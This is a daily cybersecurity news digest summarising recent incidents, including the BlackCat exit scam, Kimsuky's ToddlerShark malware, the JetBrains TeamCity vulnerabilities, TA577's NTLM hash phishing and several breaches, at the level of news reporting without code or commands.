Daily Brief

BlackCat ransomware gang is allegedly performing an exit scam, having taken offline their Tor data leak blog and negotiation servers. Administrators of BlackCat presented a fake FBI seizure notice to imply interference from federal law enforcement. Ransomware expert Fabian Wosar indicated that the seizure notice was implemented in a makeshift manner, signaling it as part of the scam. There have been accusations from an affiliate about the group stealing a $20 million ransom meant for them. The group, previously associated with high-profile attacks as DarkSide and BlackMatter, has fluctuated in activity following law enforcement pressure. BlackCat operators claim to be selling their malware source code for $5 million amid signs of wrapping up operations. It remains uncertain whether the group will resurface under a different name, given their tarnished reputation among potential affiliates.

Password management can significantly impact organizations, incurring costs through lost productivity, help desk support, and security risks. Employees spend an average of 11 hours per year on password-related issues, costing organizations $480.26 per employee in lost productivity. Help desk calls for password resets can comprise up to 50% of queries, with substantial expenses in support staff salaries and operational costs. Weak or reused passwords contribute to security vulnerabilities, with 86% of data breaches involving stolen credentials, and the average breach cost now at $4.45 million. Implementing multi-factor authentication (MFA) and single sign-on (SSO) solutions can enhance security while reducing help desk burden and costs. Regular employee training on password best practices and investing in password security software can prevent security incidents and operational inefficiencies. Self-service password reset options enable users to efficiently manage their passwords without help desk assistance, further reducing organizational expenses.

North Korean state-sponsored hacking group Kimsuky is exploiting vulnerabilities in ScreenConnect to install ToddlerShark malware. ToddlerShark malware is designed for long-term espionage, leveraging legitimate Microsoft binaries and altering the system registry to lower defenses. The malware establishes persistent access through scheduled tasks and continuously steals and exfiltrates data. ToddlerShark is a variant of Kimsuky's BabyShark and ReconShark backdoors previously targeting various international targets. The polymorphic nature of the malware makes it difficult to detect through static detection methods or signature-based systems. ToddlerShark's dynamic URL generation and unique payload hashes add to the difficulty of blocking the malware. Detailed analysis and indicators of compromise (IoCs) related to ToddlerShark to be shared by Kroll in an upcoming blog post.

Rapid7 reported two critical vulnerabilities in JetBrains' TeamCity CI/CD server in mid-February. JetBrains silently patched the vulnerabilities without a public advisory, contrary to infosec community norms. After Rapid7's warning, JetBrains published details of the vulnerabilities but didn't explain the silent patching. Exploits for the vulnerabilities began shortly after disclosure, amplifying concerns about the uncoordinated release. CVE-2024-27198 has a critical rating and enables an attacker to take administrative control and execute remote code. CVE-2024-27199 allows for information disclosure and system modification, including potential MITM attacks. JetBrains' cloud versions are safe; however, on-prem versions need updating to 2023.11.4 or the security patch plugin. The security community criticizes JetBrains' failure to adhere to coordinated vulnerability disclosure protocols.

Cybercriminals, identified as Savvy Seahorse, are using DNS hijacking to defraud victims through fake investment platforms. The scam entices individuals from various language groups, including Russian, Polish, and German speakers, showing a wide-reaching campaign. Social media ads and fake ChatGPT and WhatsApp bots lure victims into revealing personal information for purported high-return investments. The technical approach involves using DNS CNAME records to distribute traffic, making their phishing infrastructure elusive and resistant to takedown. Victims are tricked into entering personal details and depositing funds into fraudulent trading platforms, which are then transferred to a Russian bank. There is selective targeting as the actor excludes traffic from certain countries, such as Ukraine and India, though the rationale behind these exclusions is unclear. This method of cybercrime highlights an increasing sophistication in the ways DNS can be exploited for financial scams, marking a first in the use of CNAME records for such activity.

Exposure management in cybersecurity provides visibility into the entire attack surface and identifies points of vulnerability within an organization's infrastructure. It differs from exterior Attack Surface Management (ASM) by also considering data assets, user identities, and cloud configurations for a more comprehensive risk assessment. Organizations are shifting to cloud environments or hybrid models, expanding their attack surfaces and complicating the monitoring and securing processes. Security teams face challenges due to the dynamic threat landscape, with thousands of new vulnerabilities identified regularly, including critical ones exploited by ransomware. The reactive nature of traditional security processes and fragmented data across different tools makes it difficult to prioritize and address threats effectively. Exposure management aims to provide a prioritized, contextual view of potential breaches, helping organizations focus on mitigating the most serious risks first. Automated vulnerability management tools, like Intruder, help organizations continuously monitor changes and manage vulnerabilities efficiently.

Over 225,000 OpenAI ChatGPT login credentials have been sold on dark web markets. The credentials theft was linked to malware families LummaC2, Raccoon, and RedLine. A 36% increase in compromised ChatGPT accounts was observed from June to October 2023 compared to the first five months of the year. The surge in stolen credentials coincides with nation-state actors' interest in using AI and LLMs for cyberattacks. Cybercriminals are targeting devices with access to AI systems, using stolen data for espionage and conducting attacks. The misuse of valid account information has become a primary method for gaining initial access, complicating identity and access management for defenders. IBM X-Force warns that enterprise credentials can be stolen via credential reuse, browser credential stores, or from enterprise accounts accessed on personal devices.

TA577, a notorious threat actor, has been found utilizing ZIP archives in phishing emails to pilfer NTLM hashes. Two significant campaigns were detected on February 26 and 27, 2024, targeting hundreds of organizations with thousands of messages worldwide. The phishing strategy involves hijacking email threads and using ZIP files containing HTML files that prompt an actor-controlled SMB server connection. The HTML attachments aim to capture NTLMv2 Challenge/Response pairs to facilitate pass-the-hash attacks, allowing unauthorized network traversal and data access. TA577, also known as Water Curupira, is proficient in distributing advanced malware and has a history of rapidly adopting new cyberattack techniques. Proofpoint highlights TA577's agility in adapting to the cybersecurity landscape, continuously evolving methods to evade detection. To mitigate risks, organizations are advised to block outbound SMB connections to curb potential exploit avenues.

Penny Appeal, a charity aiding crisis-hit countries, ordered by ICO to stop sending unsolicited texts. Charity found to have sent over 460,000 spam texts in ten days, violating recipients' consent. ICO received 354 complaints, with recipients reporting ignored opt-out requests and intrusive messaging. Penny Appeal's failure to heed prior warnings resulted in an ICO investigation exposing a flawed database practice. The charity failed to log opt-out requests, messaging individuals who had interacted within the past five years. ICO stresses the importance of valid consent for marketing communications, regardless of the organization's size. This is not the first incidence of a charity facing ICO's scrutiny; even larger charities have been previously fined. The ICO's action highlights the ongoing responsibility for all entities, including non-profits, to comply with direct marketing laws.

Newly disclosed security vulnerabilities in JetBrains TeamCity could allow attackers to take over servers. The identified flaws, CVE-2024-27198 and CVE-2024-27199, have been fixed in the latest TeamCity version. Attackers exploiting these vulnerabilities could bypass authentication and potentially compromise a server, facilitating supply chain attacks. Rapid7, a cybersecurity firm, discovered and reported the flaws which include an authentication bypass and path traversal issue. The TeamCity Cloud instances have already been addressed, but on-premises versions require immediate updates. Prior vulnerabilities in TeamCity have seen exploitation by threat actors from North Korea and Russia, highlighting the risks of delay in patching. JetBrains urges users to update their TeamCity servers to mitigate the risk of exploitation.

Cloudflare has enhanced its web application firewall (WAF) to include protections specifically designed for applications utilizing large language models (LLMs). The service, known as "Firewall for AI," aims to prevent DDoS attacks and the leakage of sensitive data from LLM applications. Features include Advanced Rate Limiting, which caps the number of requests from a single IP or API key, and Sensitive Data Detection, geared towards identifying and preventing private information from being exposed. Clients will be able to create tailored fingerprints to control what their models reveal, with plans to introduce a beta version of prompt validation to defend against prompt injection attacks. This new firewall offering can be applied to any LLM, regardless of whether it's hosted on Cloudflare Workers AI or other platforms, as long as the traffic is proxied through Cloudflare. Cloudflare's move is a response to security concerns in AI as more companies integrate LLMs into their products, highlighting the need for specialized AI security measures.

A security lapse at a third-party service provider resulted in the exposure of American Express cardholder information, including card numbers and expiry dates. The breach involved personal data of an undisclosed number of American Express customers but did not compromise American Express's own systems. American Express's chief privacy officer, Anneke Covell, alerted affected customers through a letter advising of the potential compromise of their card account information. The state of Massachusetts publicized the incident, noting that American Express has been reported for data leaks 16 times this year in the state. Past data breaches reported involved single-digit numbers of Massachusetts residents and were often due to compromised individual merchants or data found online by law enforcement. American Express assures customers that they will not be held liable for fraudulent charges and advises customers to monitor their accounts and enable alerts for suspicious activities.

A severe security vulnerability (CVE-2024-27198) has been identified in JetBrains’ TeamCity On-Premises software, enabling attackers to gain administrative control of the server without authentication. Administrators are urged to promptly upgrade to TeamCity version 2023.11.4 or apply a security patch plugin, as full exploit details are public. The JetBrain's update also resolves a secondary vulnerability (CVE-2024-27199), which permitted alteration of certain system settings by unauthenticated users. Both vulnerabilities affect the web component of all on-premise TeamCity versions, posing potential risks for supply chain attacks. Cybersecurity firm Rapid7 demonstrated exploitability by creating an exploit for a shell access session on a TeamCity server. The less severe vulnerability could potentially be exploited to execute DoS attacks or intercept client connections if the attacker is already on the network. While the TeamCity cloud service has been patched, all unpatched on-premises installations remain vulnerable, and threat actors are anticipated to exploit these weaknesses imminently.

North Korean state-sponsored hacking group Kimsuky is utilizing flaws in ScreenConnect to deploy ToddleShark malware for espionage. ConnectWise earlier urged ScreenConnect users to update servers to patch vulnerabilities CVE-2024-1708 and CVE-2024-1709. ToddleShark uses polymorphism and legitimate Microsoft binaries to evade detection and achieve persistence for continuous data theft. The malware modifies registry settings, schedules tasks, and gathers system information to be sent to the hackers' C2 infrastructure. Kroll's cybersecurity intelligence report indicates ToddleShark's evasion techniques and ties it to previously known Kimsuky backdoors BabyShark and ReconShark. Kroll is set to release specific details and indicators of compromise related to ToddleShark in an upcoming blog post.

Hackers from TA577 are using phishing emails to steal Windows NTLM authentication hashes, enabling account hijacking. Two recent waves of attacks on February 26 and 27, 2024, specifically targeted employees' hashes at hundreds of organizations worldwide. Captured NTLM hashes can facilitate unauthorized access to accounts, sensitive data, and lateral movement within networks. The phishing emails contained ZIP archives with HTML files designed to silently connect to an attacker-controlled SMB server to capture NTLM hashes. Proofpoint's report indicates that despite the lack of malware payloads, the primary objective of these phishing efforts is to gather NTLM hashes. Experts suggest disabling multi-factor authentication increases vulnerability to such attacks and that the stolen hashes may be used for reconnaissance to identify high-value targets. Recommended defensive measures include blocking outbound SMB connections, filtering emails with zipped HTML files, and configuring Windows group policy to restrict outgoing NTLM traffic.